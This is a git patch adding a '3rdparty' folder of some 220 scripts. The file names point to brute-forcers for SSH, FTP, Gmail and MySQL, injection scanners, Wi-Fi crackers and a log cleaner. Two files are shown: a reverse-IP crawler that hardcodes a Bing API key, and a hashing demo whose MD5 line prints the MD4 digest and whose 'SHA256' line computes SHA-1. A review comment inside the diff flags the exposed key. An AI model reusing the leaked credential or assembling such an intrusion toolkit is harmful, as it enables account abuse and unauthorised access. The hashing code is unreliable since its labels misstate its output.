From 23af4af568da4d91d83a32ec6629ea7bc43d55af Mon Sep 17 00:00:00 2001 
From: Brock Date: Fri, 19 Dec 2014 17:03:19 +0800 Subject: [PATCH] 3rdparty --- 3rdparty/0x150 v2.1.py | 167 + 3rdparty/Crypter.py | 66 + 3rdparty/DNSRPCscanner.py | 178 + 3rdparty/EFSscan.py | 146 + 3rdparty/P-Web Vuln Scabber(XSS,SQL,etc).py | 1041 +++++ 3rdparty/PyLogcleaner.tar.gz | Bin 0 -> 2959 bytes 3rdparty/Scan.py | 63 + 3rdparty/XSSscan.py | 326 ++ 3rdparty/XSSscan_v1.1.py | 258 ++ 3rdparty/XSSscan_v1.2.py | 299 ++ 3rdparty/accbrute.py | 56 + 3rdparty/adminscan.py | 95 + 3rdparty/alphadbgen.py | 95 + 3rdparty/alphalowcrack.py | 30 + 3rdparty/asm2shell.py | 92 + 3rdparty/b2evobf.py | 95 + 3rdparty/bannerscan.py | 128 + 3rdparty/base64tohex.py | 27 + 3rdparty/boascan.py | 80 + 3rdparty/bulletftp.py | 114 + 3rdparty/cPanelbrute.py | 125 + 3rdparty/cesarscan.py | 115 + 3rdparty/cgiscan.py | 89 + 3rdparty/cgiscan1.1.py | 102 + 3rdparty/cgiscan1.2.py | 153 + 3rdparty/cgiscan1.3.py | 180 + 3rdparty/checkersum.py | 48 + 3rdparty/checksummer.py | 66 + 3rdparty/codefinder.py | 70 + 3rdparty/column_finder.py | 119 + 3rdparty/comparedb.py | 41 + 3rdparty/cw.py | 52 + 3rdparty/d3sqlfuzz.py | 111 + 3rdparty/dataext.py | 105 + 3rdparty/dbgen.py | 39 + 3rdparty/decoder.py | 36 + 3rdparty/diggbf.py | 91 + 3rdparty/dirbuster.py | 27 + 3rdparty/dirbuster2.py | 32 + 3rdparty/dirscan.py | 52 + 3rdparty/dnsbrute.py | 61 + 3rdparty/dorkscan.py | 101 + 3rdparty/dorkster.py | 130 + 3rdparty/dumpcrack.py | 52 + 3rdparty/dumpcrack1.1.py | 82 + 3rdparty/dumpcrack1.2.py | 117 + 3rdparty/dumpemail.py | 48 + 3rdparty/emailcollect.py | 97 + 3rdparty/emailcollect_v1.2.py | 181 + 3rdparty/emailcollect_v1.3.py | 207 + 3rdparty/encoder.py | 33 + 3rdparty/findip.py | 23 + 3rdparty/findmyhash.py | 3401 +++++++++++++++++ 3rdparty/freesms.pyw | 97 + 3rdparty/friendsterbf.py | 98 + 3rdparty/ftpanon.py | 42 + 3rdparty/ftpbrute.py | 93 + 3rdparty/ftpbrute_iprange.py | 106 + 3rdparty/ftpbrute_random.py | 155 + 3rdparty/ftpbrute_random1.0.py | 105 + 3rdparty/ftprand.py | 100 + 
3rdparty/gaimextract.py | 24 + 3rdparty/getresp.py | 43 + 3rdparty/gmailbrute.py | 103 + 3rdparty/gmailpopbrute.py | 104 + 3rdparty/goog-subdomains.py | 65 + 3rdparty/goog2text.py | 106 + 3rdparty/goog2text1.1.py | 72 + 3rdparty/goog2text1.2.py | 85 + 3rdparty/goog2text1.3.py | 105 + 3rdparty/goog2text1.4.py | 95 + 3rdparty/goog_mail_mod.py | 64 + 3rdparty/googemail.py | 105 + 3rdparty/googledork.py | 92 + "3rdparty/googlelinkc\314\247ek.py" | 29 + 3rdparty/hash-identifier.py | 577 +++ 3rdparty/hashbul.py | 3401 +++++++++++++++++ 3rdparty/hashgen.py | 35 + 3rdparty/hashtipi.py | 577 +++ 3rdparty/honeypot.py | 43 + 3rdparty/hostlookup.py | 44 + 3rdparty/htcrack.py | 29 + 3rdparty/icrack.py | 267 ++ 3rdparty/imapbrute.py | 77 + 3rdparty/imapbrute_iprange.py | 92 + 3rdparty/imapbrute_random.py | 91 + 3rdparty/ipbanscan.py | 89 + 3rdparty/ipgen.py | 34 + 3rdparty/ipgen1.1.py | 46 + 3rdparty/iplocate.py | 22 + 3rdparty/iprange.py | 34 + 3rdparty/iptext.py | 26 + 3rdparty/lafuzz.py | 814 ++++ 3rdparty/lfi_scanner.py | 445 +++ 3rdparty/lfifuzz.py | 86 + 3rdparty/lfiscan.py | 211 + 3rdparty/linkscan.py | 192 + 3rdparty/linkscan1.3.py | 182 + 3rdparty/linkscansimple.py | 66 + 3rdparty/linksysbrute.py | 81 + 3rdparty/locbrute.py | 46 + 3rdparty/logcheck.py | 35 + 3rdparty/logfind.py | 36 + 3rdparty/logfind1.1.zip | Bin 0 -> 2354 bytes 3rdparty/logreader.py | 43 + 3rdparty/mail2text.py | 76 + 3rdparty/md5check.py | 40 + 3rdparty/md5crack.py | 33 + 3rdparty/md5crack_gui.pyw | 61 + 3rdparty/md5db.py | 44 + 3rdparty/md5dbcrack.py | 79 + 3rdparty/md5gen.py | 13 + 3rdparty/md5randcrack.py | 61 + 3rdparty/md5word.py | 55 + 3rdparty/mdaemonscan.py | 203 + 3rdparty/milarchive.py | 36 + 3rdparty/milsearch.py | 25 + 3rdparty/milupdate.py | 42 + 3rdparty/milwebappext.py | 43 + 3rdparty/modlast.py | 54 + 3rdparty/msn2text.py | 94 + 3rdparty/multiscanner.py | 685 ++++ 3rdparty/multisearch.py | 328 ++ 3rdparty/mysql16.py | 53 + 3rdparty/mysql5crack.py | 49 + 3rdparty/mysql_default.py | 46 
+ 3rdparty/mysqlbrute.py | 85 + 3rdparty/mysqlbrute_iprange.py | 98 + 3rdparty/mysqlbrute_random.py | 91 + 3rdparty/niktolistscan.py | 55 + 3rdparty/nntpbrute.py | 83 + 3rdparty/nntpbrute_iprange.py | 96 + 3rdparty/nntpbrute_random.py | 95 + 3rdparty/nukescan.py | 75 + 3rdparty/openports.py | 54 + 3rdparty/orderby.py | 52 + 3rdparty/packext.py | 60 + 3rdparty/passext.py | 29 + 3rdparty/passgen.py | 70 + 3rdparty/phpBBbrute.py | 108 + 3rdparty/phpbbmembers.py | 37 + 3rdparty/phpbbscan.py | 143 + 3rdparty/phpbbver.py | 63 + 3rdparty/pincrack.py | 85 + 3rdparty/plaincrack.py | 73 + 3rdparty/popbrute.py | 84 + 3rdparty/popbrute_iprange.py | 100 + 3rdparty/popbrute_random.py | 99 + 3rdparty/proxytest.py | 62 + 3rdparty/pylogcleaner.py | 209 + 3rdparty/pywget.py | 101 + 3rdparty/pywget_simp.py | 31 + 3rdparty/qeqe.py | 40 + 3rdparty/randip.py | 23 + 3rdparty/randwebservscan.py | 42 + 3rdparty/relayfind.py | 142 + 3rdparty/revers_ip.py | 51 + 3rdparty/rfiex.py | 123 + 3rdparty/rfiscan.py | 277 ++ 3rdparty/robots.py | 22 + 3rdparty/rootbrute.py | 48 + 3rdparty/rot13.py | 23 + 3rdparty/rtgen.py | 30 + 3rdparty/sc.py | 631 +++ 3rdparty/scan_log.py | 395 ++ 3rdparty/scriptgrab.py | 37 + 3rdparty/searchdigits.py | 157 + 3rdparty/secscan.py | 776 ++++ 3rdparty/serenbf.py | 56 + 3rdparty/sha1crack.py | 37 + 3rdparty/sha1gen.py | 17 + 3rdparty/smtpbrute.py | 81 + 3rdparty/smtpbrute_iprange.py | 97 + 3rdparty/smtpbrute_random.py | 96 + 3rdparty/snmp_brute.py | 142 + 3rdparty/sqlb3m.py | 196 + 3rdparty/sqlincra.py | 50 + 3rdparty/sqlinjectionstart.py | 205 + 3rdparty/sqlresp.py | 47 + 3rdparty/sqlscan.py | 156 + 3rdparty/sqltest.py | 91 + 3rdparty/sshbrute.py | 58 + 3rdparty/sshbrute_fork.py | 84 + 3rdparty/sshbrute_iprange.py | 98 + 3rdparty/sshbrute_random.py | 89 + 3rdparty/ssl.py | 136 + 3rdparty/ssltestmulti.py | 372 ++ 3rdparty/strbreak.py | 67 + 3rdparty/subcollect.py | 45 + 3rdparty/subcollect2.py | 61 + 3rdparty/subsearch.py | 87 + 3rdparty/suidchecker.py | 71 + 
3rdparty/surgescan.py | 165 + 3rdparty/tabcolext.py | 112 + 3rdparty/telnetbrute.py | 82 + 3rdparty/telnetbrute_iprange.py | 96 + 3rdparty/telnetbrute_random.py | 95 + 3rdparty/twitterbot.py | 90 + 3rdparty/v3nom.py | 740 ++++ 3rdparty/vbscan.py | 152 + 3rdparty/webauthbrute.py | 108 + 3rdparty/webauthbrute_random.py | 173 + 3rdparty/webauthbrute_random_usersupport.py | 237 ++ 3rdparty/webmin.py | 38 + 3rdparty/webmin_rand.py | 66 + 3rdparty/webminbrute.py | 104 + 3rdparty/webscan.py | 69 + 3rdparty/webservscan.py | 50 + 3rdparty/wepcrack.py | 43 + 3rdparty/wepdecode.py | 14 + 3rdparty/wepgen.py | 37 + 3rdparty/win.py | 89 + 3rdparty/winrand.py | 94 + 3rdparty/wordcreator.py | 55 + 3rdparty/wordextract.py | 48 + 3rdparty/wordpressbf.py | 103 + 3rdparty/wordsplit.py | 54 + 3rdparty/wpacrack.py | 41 + 3rdparty/xoopscan.py | 76 + 3rdparty/xss-scanner.py | 62 + 3rdparty/xssb3m.py | 75 + 3rdparty/xssfinderb3mb4m.py | 70 + 3rdparty/xsstest.py | 121 + .../icons/OmniTouch 8660 My Teamwork.png | Bin 0 -> 2034 bytes Wappalyzer/drivers/bookmarklet/json/apps.json | 78 +- .../icons/OmniTouch 8660 My Teamwork.png | Bin 0 -> 2034 bytes Wappalyzer/drivers/firefox/data/apps.json | 78 +- .../icons/OmniTouch 8660 My Teamwork.png | Bin 0 -> 2034 bytes .../firefox/data/images/icons/Wordpress.png | Bin 2156 -> 2153 bytes .../icons/OmniTouch 8660 My Teamwork.png | Bin 0 -> 2034 bytes 230 files changed, 32108 insertions(+), 72 deletions(-) create mode 100644 3rdparty/0x150 v2.1.py create mode 100644 3rdparty/Crypter.py create mode 100644 3rdparty/DNSRPCscanner.py create mode 100644 3rdparty/EFSscan.py create mode 100644 3rdparty/P-Web Vuln Scabber(XSS,SQL,etc).py create mode 100644 3rdparty/PyLogcleaner.tar.gz create mode 100644 3rdparty/Scan.py create mode 100644 3rdparty/XSSscan.py create mode 100644 3rdparty/XSSscan_v1.1.py create mode 100644 3rdparty/XSSscan_v1.2.py create mode 100644 3rdparty/accbrute.py create mode 100644 3rdparty/adminscan.py create mode 100644 
3rdparty/alphadbgen.py create mode 100644 3rdparty/alphalowcrack.py create mode 100644 3rdparty/asm2shell.py create mode 100644 3rdparty/b2evobf.py create mode 100644 3rdparty/bannerscan.py create mode 100644 3rdparty/base64tohex.py create mode 100644 3rdparty/boascan.py create mode 100644 3rdparty/bulletftp.py create mode 100644 3rdparty/cPanelbrute.py create mode 100644 3rdparty/cesarscan.py create mode 100644 3rdparty/cgiscan.py create mode 100644 3rdparty/cgiscan1.1.py create mode 100644 3rdparty/cgiscan1.2.py create mode 100644 3rdparty/cgiscan1.3.py create mode 100644 3rdparty/checkersum.py create mode 100644 3rdparty/checksummer.py create mode 100644 3rdparty/codefinder.py create mode 100644 3rdparty/column_finder.py create mode 100644 3rdparty/comparedb.py create mode 100644 3rdparty/cw.py create mode 100644 3rdparty/d3sqlfuzz.py create mode 100644 3rdparty/dataext.py create mode 100644 3rdparty/dbgen.py create mode 100644 3rdparty/decoder.py create mode 100644 3rdparty/diggbf.py create mode 100644 3rdparty/dirbuster.py create mode 100644 3rdparty/dirbuster2.py create mode 100644 3rdparty/dirscan.py create mode 100644 3rdparty/dnsbrute.py create mode 100644 3rdparty/dorkscan.py create mode 100644 3rdparty/dorkster.py create mode 100644 3rdparty/dumpcrack.py create mode 100644 3rdparty/dumpcrack1.1.py create mode 100644 3rdparty/dumpcrack1.2.py create mode 100644 3rdparty/dumpemail.py create mode 100644 3rdparty/emailcollect.py create mode 100644 3rdparty/emailcollect_v1.2.py create mode 100644 3rdparty/emailcollect_v1.3.py create mode 100644 3rdparty/encoder.py create mode 100644 3rdparty/findip.py create mode 100644 3rdparty/findmyhash.py create mode 100644 3rdparty/freesms.pyw create mode 100644 3rdparty/friendsterbf.py create mode 100644 3rdparty/ftpanon.py create mode 100644 3rdparty/ftpbrute.py create mode 100644 3rdparty/ftpbrute_iprange.py create mode 100644 3rdparty/ftpbrute_random.py create mode 100644 3rdparty/ftpbrute_random1.0.py create mode 
100644 3rdparty/ftprand.py create mode 100644 3rdparty/gaimextract.py create mode 100644 3rdparty/getresp.py create mode 100644 3rdparty/gmailbrute.py create mode 100644 3rdparty/gmailpopbrute.py create mode 100644 3rdparty/goog-subdomains.py create mode 100644 3rdparty/goog2text.py create mode 100644 3rdparty/goog2text1.1.py create mode 100644 3rdparty/goog2text1.2.py create mode 100644 3rdparty/goog2text1.3.py create mode 100644 3rdparty/goog2text1.4.py create mode 100644 3rdparty/goog_mail_mod.py create mode 100644 3rdparty/googemail.py create mode 100644 3rdparty/googledork.py create mode 100644 "3rdparty/googlelinkc\314\247ek.py" create mode 100644 3rdparty/hash-identifier.py create mode 100644 3rdparty/hashbul.py create mode 100644 3rdparty/hashgen.py create mode 100644 3rdparty/hashtipi.py create mode 100644 3rdparty/honeypot.py create mode 100644 3rdparty/hostlookup.py create mode 100644 3rdparty/htcrack.py create mode 100644 3rdparty/icrack.py create mode 100644 3rdparty/imapbrute.py create mode 100644 3rdparty/imapbrute_iprange.py create mode 100644 3rdparty/imapbrute_random.py create mode 100644 3rdparty/ipbanscan.py create mode 100644 3rdparty/ipgen.py create mode 100644 3rdparty/ipgen1.1.py create mode 100644 3rdparty/iplocate.py create mode 100644 3rdparty/iprange.py create mode 100644 3rdparty/iptext.py create mode 100644 3rdparty/lafuzz.py create mode 100644 3rdparty/lfi_scanner.py create mode 100644 3rdparty/lfifuzz.py create mode 100644 3rdparty/lfiscan.py create mode 100644 3rdparty/linkscan.py create mode 100644 3rdparty/linkscan1.3.py create mode 100644 3rdparty/linkscansimple.py create mode 100644 3rdparty/linksysbrute.py create mode 100644 3rdparty/locbrute.py create mode 100644 3rdparty/logcheck.py create mode 100644 3rdparty/logfind.py create mode 100644 3rdparty/logfind1.1.zip create mode 100644 3rdparty/logreader.py create mode 100644 3rdparty/mail2text.py create mode 100644 3rdparty/md5check.py create mode 100644 3rdparty/md5crack.py 
create mode 100644 3rdparty/md5crack_gui.pyw create mode 100644 3rdparty/md5db.py create mode 100644 3rdparty/md5dbcrack.py create mode 100644 3rdparty/md5gen.py create mode 100644 3rdparty/md5randcrack.py create mode 100644 3rdparty/md5word.py create mode 100644 3rdparty/mdaemonscan.py create mode 100644 3rdparty/milarchive.py create mode 100644 3rdparty/milsearch.py create mode 100644 3rdparty/milupdate.py create mode 100644 3rdparty/milwebappext.py create mode 100644 3rdparty/modlast.py create mode 100644 3rdparty/msn2text.py create mode 100644 3rdparty/multiscanner.py create mode 100644 3rdparty/multisearch.py create mode 100644 3rdparty/mysql16.py create mode 100644 3rdparty/mysql5crack.py create mode 100644 3rdparty/mysql_default.py create mode 100644 3rdparty/mysqlbrute.py create mode 100644 3rdparty/mysqlbrute_iprange.py create mode 100644 3rdparty/mysqlbrute_random.py create mode 100644 3rdparty/niktolistscan.py create mode 100644 3rdparty/nntpbrute.py create mode 100644 3rdparty/nntpbrute_iprange.py create mode 100644 3rdparty/nntpbrute_random.py create mode 100644 3rdparty/nukescan.py create mode 100644 3rdparty/openports.py create mode 100644 3rdparty/orderby.py create mode 100644 3rdparty/packext.py create mode 100644 3rdparty/passext.py create mode 100644 3rdparty/passgen.py create mode 100644 3rdparty/phpBBbrute.py create mode 100644 3rdparty/phpbbmembers.py create mode 100644 3rdparty/phpbbscan.py create mode 100644 3rdparty/phpbbver.py create mode 100644 3rdparty/pincrack.py create mode 100644 3rdparty/plaincrack.py create mode 100644 3rdparty/popbrute.py create mode 100644 3rdparty/popbrute_iprange.py create mode 100644 3rdparty/popbrute_random.py create mode 100644 3rdparty/proxytest.py create mode 100644 3rdparty/pylogcleaner.py create mode 100644 3rdparty/pywget.py create mode 100644 3rdparty/pywget_simp.py create mode 100644 3rdparty/qeqe.py create mode 100644 3rdparty/randip.py create mode 100644 3rdparty/randwebservscan.py create mode 100644 
3rdparty/relayfind.py create mode 100644 3rdparty/revers_ip.py create mode 100644 3rdparty/rfiex.py create mode 100644 3rdparty/rfiscan.py create mode 100644 3rdparty/robots.py create mode 100644 3rdparty/rootbrute.py create mode 100644 3rdparty/rot13.py create mode 100644 3rdparty/rtgen.py create mode 100644 3rdparty/sc.py create mode 100644 3rdparty/scan_log.py create mode 100644 3rdparty/scriptgrab.py create mode 100644 3rdparty/searchdigits.py create mode 100644 3rdparty/secscan.py create mode 100644 3rdparty/serenbf.py create mode 100644 3rdparty/sha1crack.py create mode 100644 3rdparty/sha1gen.py create mode 100644 3rdparty/smtpbrute.py create mode 100644 3rdparty/smtpbrute_iprange.py create mode 100644 3rdparty/smtpbrute_random.py create mode 100644 3rdparty/snmp_brute.py create mode 100644 3rdparty/sqlb3m.py create mode 100644 3rdparty/sqlincra.py create mode 100644 3rdparty/sqlinjectionstart.py create mode 100644 3rdparty/sqlresp.py create mode 100644 3rdparty/sqlscan.py create mode 100644 3rdparty/sqltest.py create mode 100644 3rdparty/sshbrute.py create mode 100644 3rdparty/sshbrute_fork.py create mode 100644 3rdparty/sshbrute_iprange.py create mode 100644 3rdparty/sshbrute_random.py create mode 100644 3rdparty/ssl.py create mode 100644 3rdparty/ssltestmulti.py create mode 100644 3rdparty/strbreak.py create mode 100644 3rdparty/subcollect.py create mode 100644 3rdparty/subcollect2.py create mode 100644 3rdparty/subsearch.py create mode 100644 3rdparty/suidchecker.py create mode 100644 3rdparty/surgescan.py create mode 100644 3rdparty/tabcolext.py create mode 100644 3rdparty/telnetbrute.py create mode 100644 3rdparty/telnetbrute_iprange.py create mode 100644 3rdparty/telnetbrute_random.py create mode 100644 3rdparty/twitterbot.py create mode 100644 3rdparty/v3nom.py create mode 100644 3rdparty/vbscan.py create mode 100644 3rdparty/webauthbrute.py create mode 100644 3rdparty/webauthbrute_random.py create mode 100644 
3rdparty/webauthbrute_random_usersupport.py create mode 100644 3rdparty/webmin.py create mode 100644 3rdparty/webmin_rand.py create mode 100644 3rdparty/webminbrute.py create mode 100644 3rdparty/webscan.py create mode 100644 3rdparty/webservscan.py create mode 100644 3rdparty/wepcrack.py create mode 100644 3rdparty/wepdecode.py create mode 100644 3rdparty/wepgen.py create mode 100644 3rdparty/win.py create mode 100644 3rdparty/winrand.py create mode 100644 3rdparty/wordcreator.py create mode 100644 3rdparty/wordextract.py create mode 100644 3rdparty/wordpressbf.py create mode 100644 3rdparty/wordsplit.py create mode 100644 3rdparty/wpacrack.py create mode 100644 3rdparty/xoopscan.py create mode 100644 3rdparty/xss-scanner.py create mode 100644 3rdparty/xssb3m.py create mode 100644 3rdparty/xssfinderb3mb4m.py create mode 100644 3rdparty/xsstest.py create mode 100644 Wappalyzer/drivers/bookmarklet/images/icons/OmniTouch 8660 My Teamwork.png create mode 100644 Wappalyzer/drivers/chrome/images/icons/OmniTouch 8660 My Teamwork.png create mode 100644 Wappalyzer/drivers/firefox/data/images/icons/OmniTouch 8660 My Teamwork.png create mode 100644 Wappalyzer/drivers/html/images/icons/OmniTouch 8660 My Teamwork.png diff --git a/3rdparty/0x150 v2.1.py b/3rdparty/0x150 v2.1.py new file mode 100644 index 0000000..f3ba7f4 --- /dev/null +++ b/3rdparty/0x150 v2.1.py 
@@ -0,0 +1,167 @@ +#!/usr/bin/python +# -*- coding: utf-8 -*- +# 0x150 Web Crawler v2.1 + +from PyQt4 import QtCore, QtGui +import socket +import urllib +import urllib2 +import mechanize +import urlparse +from xml.dom.minidom import parse, parseString +from bs4 import BeautifulSoup +import base64 +try: + _fromUtf8 = QtCore.QString.fromUtf8 +except AttributeError: + _fromUtf8 = lambda s: s +class MyOpener(urllib.FancyURLopener): + version = 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15' + +class Ui_MainWindow(object): + def setupUi(self, MainWindow): + MainWindow.setObjectName(_fromUtf8("MainWindow")) + MainWindow.resize(722, 364) + self.centralwidget = QtGui.QWidget(MainWindow) + self.centralwidget.setObjectName(_fromUtf8("centralwidget")) + self.pushButton = QtGui.QPushButton(self.centralwidget) + self.pushButton.setGeometry(QtCore.QRect(320, 10, 111, 31)) + self.pushButton.setObjectName(_fromUtf8("pushButton")) + self.listView = QtGui.QListWidget(self.centralwidget) + self.listView.setGeometry(QtCore.QRect(10, 50, 301, 251)) + self.listView.setObjectName(_fromUtf8("listView")) + self.textEdit = QtGui.QLineEdit(self.centralwidget) + self.textEdit.setGeometry(QtCore.QRect(10, 10, 301, 31)) + self.textEdit.setObjectName(_fromUtf8("textEdit")) + self.textEdit.setPlaceholderText(_fromUtf8("Reverse Çek")) + self.pushButton_2 = QtGui.QPushButton(self.centralwidget) + self.pushButton_2.setGeometry(QtCore.QRect(320, 50, 111, 31)) + self.pushButton_2.setObjectName(_fromUtf8("pushButton_2")) + #self.pushButton_4 = QtGui.QPushButton(self.centralwidget) + #self.pushButton_4.setGeometry(QtCore.QRect(320, 90, 111, 31)) + #self.pushButton_4.setObjectName(_fromUtf8("pushButton_4")) + self.listView_2 = QtGui.QListWidget(self.centralwidget) + self.listView_2.setGeometry(QtCore.QRect(440, 10, 271, 291)) + self.listView_2.setObjectName(_fromUtf8("listView_2")) + self.pushButton_5 = QtGui.QPushButton(self.centralwidget) + 
self.pushButton_5.setGeometry(QtCore.QRect(320, 90, 111, 31)) + self.pushButton_5.setObjectName(_fromUtf8("pushButton_5")) + self.pushButton_3 = QtGui.QPushButton(self.centralwidget) + self.pushButton_3.setGeometry(QtCore.QRect(320, 270, 111, 31)) + self.pushButton_3.setObjectName(_fromUtf8("pushButton_3")) + MainWindow.setCentralWidget(self.centralwidget) + self.menubar = QtGui.QMenuBar(MainWindow) + self.menubar.setGeometry(QtCore.QRect(0, 0, 722, 29)) + self.menubar.setObjectName(_fromUtf8("menubar")) + self.menuDosya = QtGui.QMenu(self.menubar) + self.menuDosya.setObjectName(_fromUtf8("menuDosya")) + + MainWindow.setMenuBar(self.menubar) + self.statusbar = QtGui.QStatusBar(MainWindow) + self.statusbar.setObjectName(_fromUtf8("statusbar")) + MainWindow.setStatusBar(self.statusbar) + self.actionKaydet = QtGui.QAction(MainWindow) + self.actionKaydet.setObjectName(_fromUtf8("actionKaydet")) + self.actionKaydet.setShortcut('Ctrl+S') + + self.actionKaydet.triggered.connect(self.saveFile) + self.actionExit = QtGui.QAction(MainWindow) + self.actionExit.setObjectName(_fromUtf8("actionExit")) + self.actionExit.setShortcut('Ctrl+Q') + self.actionExit.triggered.connect(QtGui.qApp.quit) + self.menuDosya.addAction(self.actionKaydet) + self.menuDosya.addAction(self.actionExit) + self.menubar.addAction(self.menuDosya.menuAction()) + + self.retranslateUi(MainWindow) + QtCore.QMetaObject.connectSlotsByName(MainWindow) + QtCore.QObject.connect(self.pushButton,QtCore.SIGNAL("clicked()"),self.reverse) + QtCore.QObject.connect(self.pushButton_2,QtCore.SIGNAL("clicked()"),self.cekkeke) + # QtCore.QObject.connect(self.pushButton_4,QtCore.SIGNAL("clicked()"),self.temizle) + QtCore.QObject.connect(self.pushButton_5,QtCore.SIGNAL("clicked()"),self.temizle2) + QtCore.QObject.connect(self.pushButton_3,QtCore.SIGNAL("clicked()"),self.saveFile) + + def temizle(self): + self.listView_2.clear() + def temizle2(self): + self.listView.clear() + def cekkeke(self): + self.listView_2.clear() + 
self.myopener = MyOpener() + #page = urllib.urlopen(url) + self.page = self.myopener.open("http://"+ str(self.listView.currentItem().text())) + + self.text = self.page.read() + self.page.close() + + self.soup = BeautifulSoup(self.text) + + for self.tag in self.soup.findAll('a', href=True): + self.xx = self.tag["href"] + if self.xx.startswith("http://") == False and self.xx.startswith("https://")==False: + if self.xx.startswith("/")==True: + self.listView_2.addItem(self.listView.currentItem().text()+self.xx) + else: + self.listView_2.addItem(self.listView.currentItem().text()+"/"+self.xx) + def retranslateUi(self, MainWindow): + MainWindow.setWindowTitle(QtGui.QApplication.translate("MainWindow", "0x150 Web Crawler v2.1", None, QtGui.QApplication.UnicodeUTF8)) + self.pushButton.setText(QtGui.QApplication.translate("MainWindow", "< < Reverse IP", None, QtGui.QApplication.UnicodeUTF8)) + self.pushButton_2.setText(QtGui.QApplication.translate("MainWindow", "<< Crawler >>", None, QtGui.QApplication.UnicodeUTF8)) + self.pushButton_3.setText(QtGui.QApplication.translate("MainWindow", "< < Kaydet >>", None, QtGui.QApplication.UnicodeUTF8)) + self.menuDosya.setTitle(QtGui.QApplication.translate("MainWindow", "Dosya", None, QtGui.QApplication.UnicodeUTF8)) + #self.menuHakk_nda.setTitle(QtGui.QApplication.translate("MainWindow", "Hakkında", None, QtGui.QApplication.UnicodeUTF8)) + self.actionKaydet.setText(QtGui.QApplication.translate("MainWindow", "Kaydet", None, QtGui.QApplication.UnicodeUTF8)) + self.actionExit.setText(QtGui.QApplication.translate("MainWindow", "Exit", None, QtGui.QApplication.UnicodeUTF8)) + #self.pushButton_4.setText(QtGui.QApplication.translate("MainWindow", "Temizle >>", None, QtGui.QApplication.UnicodeUTF8)) + self.pushButton_5.setText(QtGui.QApplication.translate("MainWindow", "< < Temizle", None, QtGui.QApplication.UnicodeUTF8)) + def saveFile(self): + self.filename = QtGui.QFileDialog.getSaveFileName(None, 'Save File',"/") + self.f = 
open(self.filename, 'w') + self.xe = open(self.textEdit.text()+"_reverse-ip.txt","w") + items = [] + cocumuyo = [] + for index in xrange(self.listView_2.count()): + items.append(self.listView_2.item(index)) + for i in items: + #print i.text() + self.f.write(i.text()+"\n") + for ix in xrange(self.listView.count()): + cocumuyo.append(self.listView.item(ix)) + for i in cocumuyo: + self.xe.write(i.text()+"\n") + self.xe.close() + self.f.close() + #print self.listView.currentItem().text() + def reverse(self): + self.listView.addItem(self.textEdit.text()) + self.sites = [] + self.top = 50 + self.skip = 0 + self.account_key ="6XgKqcpSQqUPnODbSdOK9sOy30ng0ilUci99d5pol8I" + self.ipal = self.textEdit.text() + self.ip = socket.gethostbyname(str(self.ipal)) + while self.skip < 200: + self.url = "https://api.datamarket.azure.com/Data.ashx/Bing/Search/v1/Web?Query='ip:%s'&$top=%s&$skip=%s&$format=Atom"%(self.ip,self.top,self.skip) + self.request = urllib2.Request(self.url) + self.auth = base64.encodestring("%s:%s" % (self.account_key, self.account_key)).replace("\n", "") + self.request.add_header("Authorization", "Basic %s" % self.auth) + self.res = urllib2.urlopen(self.request) + self.data = self.res.read() + self.xmldoc = parseString(self.data) + self.site_list = self.xmldoc.getElementsByTagName('d:Url') + for self.site in self.site_list: + self.domain = self.site.childNodes[0].nodeValue + self.domain = self.domain.split("/")[2] + if self.domain not in self.sites: + self.sites.append(self.domain) + self.skip += 50 + for self.xs in self.sites: + self.listView.addItem(self.xs) +if __name__ == "__main__": + import sys + app = QtGui.QApplication(sys.argv) + MainWindow = QtGui.QMainWindow() + ui = Ui_MainWindow() + ui.setupUi(MainWindow) + MainWindow.show() + sys.exit(app.exec_()) \ No newline at end of file diff --git a/3rdparty/Crypter.py b/3rdparty/Crypter.py new file mode 100644 index 0000000..c0615a0 --- /dev/null +++ b/3rdparty/Crypter.py 
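Review bot: The `self.account_key = ...` assignment in `reverse` commits a literal API account key for the Bing search service to the repository; once pushed it has to be treated as exposed, so it should be revoked and replaced by a value read at runtime, e.g. `self.account_key = os.environ["BING_ACCOUNT_KEY"]` (constructed name; add `import os` to the imports) and the history scrubbed. `saveFile` opens the path returned by `QtGui.QFileDialog.getSaveFileName` without checking for the empty value a cancelled dialog returns, so `open(self.filename, 'w')` raises there; a guard such as `if not self.filename: return` before the open, and `with open(...)` for both files so they are closed on error, would make it robust. The file is Python 2 only (`urllib2`, `xrange`, `print` statements), presumably intentional for PyQt4, but the header does not say so.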
@@ -0,0 +1,66 @@
+from Crypto.Hash import HMAC
+from Crypto.Hash import MD2
+from Crypto.Hash import MD4
+from Crypto.Hash import MD5
+from Crypto.Hash import RIPEMD
+from Crypto.Hash import SHA
+from Crypto.Hash import SHA256
+
+
+
+ ########
+ #B3mB4m#
+ ########
+
+
+#Hi guyss im B3mB4m to day topic how to use PyCrypto - The Python Cryptography Toolkit ? !!
+
+# You can see codes here, but � want change somethins
+
+word = raw_input("Give me the word : ")
+
+
+"""
+
+from Crypto.Hash import HMAC
+from Crypto.Hash import MD2
+from Crypto.Hash import MD4
+from Crypto.Hash import MD5
+from Crypto.Hash import RIPEMD
+from Crypto.Hash import SHA
+from Crypto.Hash import SHA256
+
+HMAC-MD2-MD4-MD5-SHA-SHA526-RIPEMD .. now lets try
+
+
+"""
+
+
+secret = b'B3mB4m'
+h = HMAC.new(secret)
+h.update(word)
+print "HMAC = "+h.hexdigest()
+
+h2 = MD2.new()
+h2.update(word)
+print "MD2 = "+h2.hexdigest()
+
+h3 = MD4.new()
+h3.update(word)
+print "MD4 = "+h3.hexdigest()
+
+h4 = MD5.new()
+h4.update(word)
+print "MD5 = "+h3.hexdigest()
+
+h5 = RIPEMD.new()
+h5.update(word)
+print "RIPEMD = "+h5.hexdigest()
+
+h6 = SHA.new()
+h6.update(word)
+print "SHA = "+h6.hexdigest()
+
+h7 = SHA.new()
+h7.update(word )
+print "SHA256 = "+h7.hexdigest()
diff --git a/3rdparty/DNSRPCscanner.py b/3rdparty/DNSRPCscanner.py
new file mode 100644
index 0000000..4787401
--- /dev/null
+++ b/3rdparty/DNSRPCscanner.py
